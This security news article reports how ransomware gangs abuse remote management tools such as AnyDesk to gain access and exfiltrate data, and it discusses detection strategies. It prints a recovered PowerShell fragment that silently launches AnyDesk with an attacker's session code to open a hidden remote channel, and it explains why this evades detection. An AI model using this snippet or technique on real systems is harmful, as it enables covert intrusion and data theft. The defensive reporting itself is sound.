Ransomware Gangs Leveraging RMM Tools to Attack Organizations and Exfiltrate Data

Remote Monitoring and Management (RMM) software has long been the silent partner of help-desk engineers, automating patch cycles and troubleshooting sessions across sprawling enterprises.

Over the past year, however, the same remote consoles have been quietly repurposed by ransomware gangs that crave the built-in trust, elevated privileges, and encrypted tunnels these tools provide.

By masquerading as legitimate IT activity, criminal operators bypass endpoint detection solutions that remain tuned for classic malware beacons, not for sanctioned binaries signing in from the cloud.

The pivot toward RMM-based intrusions accelerated in late-2024 when several campaigns replaced custom loaders with off-the-shelf agents such as AnyDesk, ScreenConnect, PDQ Deploy, and SimpleHelp.

Attackers simply ride the installer’s normal update channels or plant trojanized packages in phishing lures, then fan out laterally and stage data for double-extortion within minutes of first execution.

In multiple incidents, the ransomware payload itself was triggered weeks after the initial beachhead, allowing exfiltration to proceed unnoticed behind routine administrative chatter.

CATO Networks analysts noted the trend while reconstructing network forensics at three victim organizations: a U.K. manufacturer hit by Hunters International, a U.S. construction firm crippled by Medusa, and a non-profit breached by an unnamed affiliate.

Packet captures in each case displayed a tell-tale spike of outbound TCP/7070 flows—the AnyDesk rendezvous port—followed by encrypted file transfers to cloud relays.

Because the binaries were signed and already whitelisted by policy, endpoint logs raised no red flags. A deeper inspection of the traffic revealed that RMM agents serve as multifunction malware droppers.

They download arbitrary PowerShell scripts, schedule persistence tasks, and even orchestrate mass-deployment of the final locker through their own software-distribution modules.

The dual-use dilemma forces defenders to inspect context—such as first-time use on a host or unexpected off-hours sessions—rather than relying on signature-based rules.

Detection Evasion via Certificate-Pinned Tunnels

The most insidious capability abused by operators is the certificate-pinned TLS tunnel embedded in many commercial RMM offerings.

Because the agent validates only the vendor’s hard-coded certificate chain, traditional SSL interception or sandboxing cannot break and inspect the payload without triggering a connection failure.

Adversaries exploit this guarantee of privacy to push stage-two scripts and siphon gigabytes of intellectual property.

The following PowerShell fragment, recovered from the Hunters International case, illustrates how a phished .lnk shortcut silently piggy-backs on an installed AnyDesk client to phone home:

$session = Start-Process "C:\Program Files\AnyDesk\AnyDesk.exe" `
            -ArgumentList "--with-session-code=742983451 --plain" `
            -WindowStyle Hidden -PassThru;
Start-Sleep -Seconds 5;
$session.WaitForExit()

Here, the attacker invokes an existing binary, passes a pre-assigned session code, hides the window, and relinquishes control once the remote desktop channel is active.

Because no new executable is written to disk, behavioral heuristics that focus on file-creation events remain blind.

Until vendors expose granular telemetry—such as destination fingerprints and unexpected CLI flags—security teams must combine network anomaly detection with strict role-based access policies to spot the first unauthorized console launch before encryption threads begin to crawl.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now